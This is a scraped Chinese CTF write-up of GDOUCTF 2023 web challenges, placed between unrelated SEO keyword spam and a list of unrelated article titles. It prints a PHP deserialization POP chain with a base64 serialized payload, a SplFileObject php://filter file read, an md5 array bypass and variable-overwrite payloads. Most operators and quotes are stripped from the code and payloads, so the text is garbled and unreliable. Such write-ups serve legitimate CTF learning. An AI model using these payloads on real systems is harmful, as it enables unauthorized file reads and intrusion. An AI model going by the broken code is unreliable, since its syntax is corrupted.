当前位置: 首页 > news >正文

做纸贸易的好网站国家企业信息查询平台官网

做纸贸易的好网站,国家企业信息查询平台官网,网站那个做的比较好,网站主体负责人查询[GDOUCTF 2023]hate eat snake 考察#xff1a;js代码审计 打开题目#xff0c;发现需要坚持60秒#xff0c;那么简单的一个思路就是修改得分的变量60即可 办法1#xff1a;修改变量 右键查看源代码#xff0c;之后发现有一个snake.js的文件#xff0c;ctrlf搜索i…[GDOUCTF 2023]hate eat snake 考察js代码审计 打开题目发现需要坚持60秒那么简单的一个思路就是修改得分的变量60即可 办法1修改变量 右键查看源代码之后发现有一个snake.js的文件ctrlf搜索if发现判断过关的条件是getScore60 搜索发现getScore在Snake.prototype中 在控制台执行 payload Snake.prototype.getScore () 61控制台开始调用函数 在游戏界面再按一下空格得到flag 方法2 先玩游得到分数后在放着界面停留60秒再按空格获取flag [GDOUCTF 2023]泄露的伪装 考察目录扫描php伪协议 由于环境打不开了我就根据别人的wp提供下思路 思路打开题目----目录扫描rar文件下载---代码审计---php伪协议inputdata get参数为?cxkphp://input post参数为ctrl 或者使用下面一种  ?cxkdata://text/plain,ctrl[GDOUCTF 2023]反方向的钟  考察反序列化原生类SplFileObject 打开题目发现一大串代码看到类了猜测考察反序列化需要构造poc链 ?php error_reporting(0); highlight_file(__FILE__); // flag.php class teacher{public $name;public $rank;private $salary;public function __construct($name,$rank,$salary 10000){$this-name $name;$this-rank $rank;$this-salary $salary;} }class classroom{public $name;public $leader;public function __construct($name,$leader){$this-name $name;$this-leader $leader;}public function hahaha(){if($this-name ! one class or $this-leader-name ! ing or $this-leader-rank !department){return False;}else{return True;}} }class school{public $department;public $headmaster;public function __construct($department,$ceo){$this-department $department;$this-headmaster $ceo;}public function IPO(){if($this-headmaster ong){echo Pretty Good ! Ctfer!\n;echo new $_POST[a]($_POST[b]);}}public function __wakeup(){if($this-department-hahaha()) {$this-IPO();}} }if(isset($_GET[d])){unserialize(base64_decode($_GET[d])); } ? 分析 能利用原生类SplFileObject读取文件 找到最核心的IPO()关键点new $_POST[‘a’] ($_POST[‘b’]) 可以POST请求利用原生类读取文件获得flag(base64编码) 步骤 要执行IPO()看到__wakeup()下要先执行hahaha() 再找到hahaha()所在的类为classroom要使返回为真三个变量赋值得为对应的值leader指向name和rank的值也就说明$leadernew teacher()发现name和rank是在teacher类那里 构造poc链 ?php class teacher{public $nameing;public $rankdepartment;private $salary; }class classroom{public $nameone class;public $leader; }class school{public $department;public $headmasterong; }$anew school(); $a-departmentnew classroom(); $a-department-leadernew teacher(); echo base64_encode(serialize($a));Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjozOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO3M6MTU6IgB0ZWFjaGVyAHNhbGFyeSI7aToxMDAwMDt9fXM6MTA6ImhlYWRtYXN0ZXIiO3M6Mzoib25nIjt9之后利用原生类SplFileObject读取文件 a为类,b用php协议读取flag.php   /代码中说了flag在flag.php中 所以POST的payload为: aSplFileObjectbphp://filter/readconvert.base64-encode/resourceflag.php 进行访问 得到base64编码我们再进行解码得到flag ?php $flag NSSCTF{c18adac3-acf0-4efa-ab63-10279c78c08d}; ? [GDOUCTF 2023]受不了一点 考察md5绕过强/弱类型比较变量覆盖 打开题目得到源码 ?php error_reporting(0); header(Content-type:text/html;charsetutf-8); if(isset($_POST[gdou])isset($_POST[ctf])){$b$_POST[ctf];$a$_POST[gdou];if($_POST[gdou]!$_POST[ctf] md5($a)md5($b)){if(isset($_COOKIE[cookie])){if ($_COOKIE[cookie]j0k3r){if(isset($_GET[aaa]) isset($_GET[bbb])){$aaa$_GET[aaa];$bbb$_GET[bbb];if($aaa114514 $bbb114514 $aaa!$bbb){$give cancanwordflag;$get hacker!;if(isset($_GET[flag]) isset($_POST[flag])){die($give);}if($_POST[flag] flag || $_GET[flag] flag){die($get);}foreach ($_POST as $key $value) {$$key $value;}foreach ($_GET as $key $value) {$$key $$value;}echo $flag;}else{echo 洗洗睡吧;}}else{echo 行不行啊细狗;}} } else {echo 菜菜; } }else{echo 就这?; } }else{echo 别来沾边; } ? 别来沾边 初步分析我们需要进行四组绕过  if($_POST[gdou]!$_POST[ctf] md5($a)md5($b)) 这里我们需要进行md5绕过并且为强类型比较绕过我们可以考虑用数组绕过也可以用md5碰撞进行绕过 md5()函数无法处理数组如果传入的为数组会返回NULL所以两个数组经过加密后得到的都是NULL,也就是相等的。  例如 a[]1b[]2 gdou[]1ctf[]2 //绕过第一步 这里为简单的cookie赋值我们用火狐浏览器的hackbar插件就能修改cookie的值  if ($_COOKIE[cookie]j0k3r 这里为弱比较类型的绕过我们可以用小数点进行绕过 也可以后面加字符进行绕过 if($aaa114514 $bbb114514 $aaa!$bbb 构造payload aaa114514bbb114514.a 接着下面这里考察的是变量覆盖 if($_POST[flag] flag || $_GET[flag] flag){die($get);}foreach ($_POST as $key $value) {$$key $value;}foreach ($_GET as $key $value) {$$key $$value;}echo $flag; 直接构造payload变色的变量可以改变但与后面的需要相同 123flagflag123 最后抓包构造所有的payload POST /?aaa114514bbb114514a123flagflag123 post参数 gdou[]1ctf[]2 [GDOUCTF 2023]EZ WEB 考察http协议 由于环境开启不了看了下别人的wp讲讲思路 思路右键查看网页源代码---访问有关于flag的路由---BP抓包修改请求方式为POST
http://www.tj-hxxt.cn/news/218513.html

相关文章:

  • 企业网站设计欣赏小企业网站建设有什么用
  • 网站开发实训报告总结2021做网站需要哪个系统
  • 自助做app的网站app模拟制作
  • 网站建设合理化建议方案个人网页制作成品代码免费
  • 中国建设银行e路通网站做公司网站要走哪些流程
  • 江阴网站的建设域名解析不成功是什么意思
  • 建设商务网站的方案河北爱站网络科技有限公司
  • 提升审美的网站wordpress 语法编辑
  • .net 免备案网站空间 最新版天堂资源网在线
  • 免费建设网站的画出电商网站设计实训总结报告
  • wordpress免费网站模板四川省人事考试网
  • 连云港网站备案在哪优惠活动推广文案
  • 贸易公司网站建设要多少钱wordpress这么安装不了
  • 网站优化工作内容湖南省建设厅易晓林
  • 个人网站怎么申请注册建设网站企业网上银行
  • 织梦印刷公司网站源码在农村做相亲网站怎么样
  • 网站店铺分布图怎么做微信商户平台入口
  • 网站动画特效网站开发多少钱一个月
  • 深圳网站开发外包哪家好论坛网站开发开题报告
  • 中山网站建设制作 超凡科技网站项目开发的制作流程
  • 服务器添加网站网站建设的关键问题
  • 网站网页区别wordpress 判断用户组
  • 经营网站挣钱外包网站开发公司
  • 电脑哪里做模板下载网站网络维护基础知识
  • 郑州网站seo优建设银行网站怎么登录
  • 无锡网站制作推广php网站开发wamp
  • 武邑网站建设代理公司简介ppt模板免费
  • 工程公司会计账务处理温州seo方法
  • 门户网站建设信息化项目背景连云港外贸网站建设
  • 江阴建设局网站招考自己建网站做外贸